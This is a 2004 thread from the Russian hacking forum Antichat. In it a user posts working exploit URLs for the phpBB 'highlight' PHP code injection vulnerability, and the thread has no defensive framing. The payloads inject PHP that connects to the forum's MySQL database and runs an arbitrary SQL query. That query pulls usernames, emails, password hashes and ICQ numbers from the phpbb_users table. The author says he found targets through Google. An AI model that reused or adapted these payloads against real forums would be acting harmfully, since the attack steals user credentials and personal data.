ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Исследование уязвимости в phpBB (highlight) в Гугле =)
  #1  
Старый 27.12.2004, 06:15
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию Исследование уязвимости в phpBB (highlight) в Гугле =)

Вот полазил по гуглу - баг php ещё рулит, тока вот далеко не на всех сервах можно выполнить команду system(), а мне хотелось получить не которые данные из базы. ВОт что получилось в результате:

viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$db passwd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).print(mysql_num_rows($mvar)).mysql_close().%252 7&sqlq=SELECT+username,user_email,user_password,us er_icq+FROM+phpbb_users+WHERE+LENGTH(user_icq)%3E5 +AND+LENGTH(user_icq)%3C9;
этим получаем количество записей соответствующих запросу

viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$db passwd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).(($llrow=mysql_fetch_array($mvar))?0:1).print(s erialize($llrow).(($llrow=mysql_fetch_array($mvar) )?0:1).print(serialize($llrow). {...} .$_GET[br]).mysql_close().%2527&sqlq=SELECT+username,user_em ail,user_password,user_icq+FROM+phpbb_users+WHERE+ LENGTH(user_icq)%3E5+AND+LENGTH(user_icq)%3C9;&br= <br>
это получаем данные. {...} - здесь N-ое количество
(($llrow=mysql_fetch_array($mvar))?0:1).print(seri alize($llrow).
P.S.: в обоих запросах считается, что префих тавлиц phpbb_, если он другой, нужно его заменить.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие есть уязвимости в Powered by phpBB: 2.0.0 © 2001 phpBB Group? forever777 Форумы 4 14.12.2005 13:19
Уязвимости в форумах phpbb до версии 2.0.13 *Van* Форумы 3 27.11.2005 00:43
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Вопрос про уязвимости в phpbb <=2.0.11 Evgeny Форумы 2 27.12.2004 13:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ